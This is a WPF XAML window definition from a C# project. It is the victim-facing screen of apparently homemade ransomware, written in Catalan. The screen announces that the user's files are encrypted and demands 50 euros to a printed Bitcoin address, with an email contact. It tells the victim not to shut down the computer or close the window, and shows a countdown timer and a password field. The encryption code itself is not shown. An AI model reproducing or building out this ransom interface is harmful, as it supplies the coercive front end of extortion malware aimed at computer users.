C# VisualStudio Project/MainWindow.xaml

<Window x:Class="TR.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:TR"
        mc:Ignorable="d"
        Height="600" Width="700"
        WindowStyle="None" ResizeMode="NoResize"
        Background="Transparent"
        AllowsTransparency="True"
        Icon="Images/Icon.png"
        Visibility="Visible"
        Name="Ventana"
        WindowStartupLocation="CenterScreen"
        Closing="Ventana_Closing">
    <Border CornerRadius="20" MouseDown="MoverPantalla">
        <Border.Background>
            <LinearGradientBrush EndPoint="0.5,1" StartPoint="0.5,0">
                <GradientStop Color="#FF7B1107" Offset="1"/>
                <GradientStop Color="#FFF32611" Offset="0.017"/>
            </LinearGradientBrush>
        </Border.Background>
        <StackPanel Margin="20" Orientation="Vertical">
            <Grid Height="560">
                <Grid.RowDefinitions>
                    <RowDefinition Height="*"/>
                    <RowDefinition Height="80"/>
                </Grid.RowDefinitions>
                <Grid.ColumnDefinitions>
                    <ColumnDefinition Width="*"></ColumnDefinition>
                    <ColumnDefinition Width="430"></ColumnDefinition>
                </Grid.ColumnDefinitions>
                <Border Grid.Column="1" CornerRadius="20">
                    <Border.Background>
                        <LinearGradientBrush EndPoint="0.5,1" StartPoint="0.5,0" Opacity="0.7">
                            <GradientStop Color="#FFF95F4F" Offset="1"/>
                            <GradientStop Color="#FFF32611" Offset="0"/>
                        </LinearGradientBrush>
                    </Border.Background>
                    <StackPanel Margin="10">
                        <TextBlock Height="35" 
                                   FontSize="30" 
                                   HorizontalAlignment="Center" 
                                   Text="ARXIUS ENCRIPTATS"
                                   FontFamily="Cascadia Mono SemiBold"
                                   FontWeight="Medium"
                                   FontStyle="Oblique"
                                   Foreground="#2AC3E0"
                        ></TextBlock>
                        <Label BorderThickness="2" Height="2" Width="356" HorizontalAlignment="Center" BorderBrush="White"></Label>
                        <TextBlock Height="15" Foreground="White" Text="Tots Els Teus Arxius Han Estat" FontSize="15" FontFamily="Cascadia Code" Margin="0,14,0,0" FontWeight="Bold" HorizontalAlignment="Center"></TextBlock>
                        <TextBlock Height="25" Foreground="White" Text="Encriptats" FontSize="15" FontFamily="Cascadia Code" HorizontalAlignment="Center" VerticalAlignment="Top" FontWeight="Bold"></TextBlock>
                        <TextBlock Height="15" Width="290" Text="Per A Desencriptar-los Enviï 50 €" FontSize="15" FontFamily="Cascadia Code" HorizontalAlignment="Center" FontWeight="Bold" Foreground="White"></TextBlock>
                        <TextBlock Height="15" Text="Al Compte De Bitcoin" FontSize="15" FontFamily="Cascadia Code" HorizontalAlignment="Center" FontWeight="Bold" Foreground="White"></TextBlock>
                        <TextBlock Height="28" Text="I Contacta Amb test@gmail.com" FontSize="15" FontFamily="Cascadia Code" HorizontalAlignment="Center" FontWeight="Bold" Foreground="White"></TextBlock>
                        <TextBlock Height="35" FontWeight="Medium" FontStyle="Oblique" FontFamily="Cascadia Mono SemiBold" FontSize="30" HorizontalAlignment ="Center" Margin="0,15,0,0" Text="NORMES" Foreground="#2AC3E0" ></TextBlock>
                        <Label BorderThickness="2" Height="2" Width="110" HorizontalAlignment="Center" BorderBrush="White"></Label>
                        <TextBlock Height="auto" FontWeight="Bold" Margin="20,20,0,0"  HorizontalAlignment="Center" TextWrapping="Wrap" FontSize="19" Text="1. No Apaguis El Teu Ordinador
                            2. No Intentis Tancar Aquesta Finestra
                            3. No T'inventis La Contrasenya
                            4. No Obris Els Arxius Encriptats">
                            <TextBlock.Foreground>
                                <SolidColorBrush Color="Black" Opacity="0.89"/>
                            </TextBlock.Foreground>
                        </TextBlock>
                        <TextBlock Height="35" FontWeight="Medium" FontStyle="Oblique" FontFamily="Cascadia Mono SemiBold" FontSize="30" HorizontalAlignment ="Center" Margin="0,26,0,0" Text="COMPTE BITCOIN" Foreground="#2AC3E0" ></TextBlock>
                        <Label BorderThickness="2" Height="2" Width="250" HorizontalAlignment="Center" BorderBrush="White"></Label>
                        <TextBlock Height="40" Margin="0,32,0,0" Width="auto" Text="1E4meg4rrZyTGHBYwx21QVWK7fsLpEoXZy" FontSize="19" FontFamily="Cascadia Code" HorizontalAlignment="Center" FontWeight="Bold" Foreground="White"></TextBlock>
                    </StackPanel>
                </Border>
                <Grid>
                    <Grid.RowDefinitions>
                        <RowDefinition></RowDefinition>
                        <RowDefinition Height="230"></RowDefinition>
                    </Grid.RowDefinitions>
                    <Image Width="330" Height="330" HorizontalAlignment="Center" VerticalAlignment="Center" Source="Images/Candado.png"></Image>
                    <Border Grid.Row="1" Margin="0,10,15,0" CornerRadius="20" >
                        <Border.Background>
                            <LinearGradientBrush EndPoint="0.5,1" StartPoint="0.5,0">
                                <GradientStop Color="#FFBD1D0D"/>
                                <GradientStop Color="#FFF95F4F" Offset="1"/>
                                <GradientStop Color="#FFB21B0C" Offset="0.187"/>
                            </LinearGradientBrush>
                        </Border.Background>
                        <StackPanel>
                            <TextBlock Height="33" Margin="0,40,0,0" Text="COMPTE ATRAS" FontWeight="Medium" FontStyle="Oblique" FontFamily="Cascadia Mono SemiBold" FontSize="28" Foreground="#2AC3E0" HorizontalAlignment ="Center"></TextBlock>
                            <Label BorderThickness="2" Height="2" Width="200" HorizontalAlignment="Center" BorderBrush="White"></Label>
                            <Label Name="AD" Width="200"  Margin="0,40,0,0" HorizontalAlignment="Center" FontSize="50" Content="00:00:00" FontFamily="Impact" Height="70" Foreground="White"/>
                        </StackPanel>
                    </Border>
                </Grid>
                <StackPanel Orientation="Horizontal" Grid.Row="1" Grid.Column="0" Grid.ColumnSpan="2">
                    <TextBox Width="500" Style="{StaticResource EstiloTextBox}" Name="Texto"></TextBox>
                    <Button Width="147" Margin="13,5,0,0" Name="Boton" Click="ClickBoton">
                        <Button.Style>
                            <Style TargetType="Button">
                                <Setter Property="FontSize" Value="50"></Setter>
                                <Setter Property="FontFamily" Value="Impact"></Setter>
                                <Setter Property="Foreground" Value="White"></Setter>
                                <Setter Property="Content" Value="✔️"></Setter>
                                <Style.Triggers>
                                    <Trigger Property="IsMouseOver" Value="True">
                                        <Setter Property="FontSize" Value="60"></Setter>
                                        <Setter Property="Foreground" Value="White"></Setter>
                                    </Trigger>
                                </Style.Triggers>
                            </Style>
                        </Button.Style>
                        <Button.Template>
                            <ControlTemplate TargetType="Button">
                                <Border Margin="0" CornerRadius="20">
                                    <Border.Background>
                                        <LinearGradientBrush EndPoint="0.5,1" StartPoint="0.5,0">
                                            <GradientStop Color="#FF8C1408"/>
                                            <GradientStop Color="#FFF95F4F" Offset="1"/>
                                            <GradientStop Color="#FF8B1408" Offset="0.187"/>
                                        </LinearGradientBrush>
                                    </Border.Background>
                                    <ContentPresenter VerticalAlignment="Center" HorizontalAlignment="Center"></ContentPresenter>
                                </Border>
                            </ControlTemplate>
                        </Button.Template>
                    </Button>
                </StackPanel>
            </Grid>
        </StackPanel>
    </Border>
</Window>
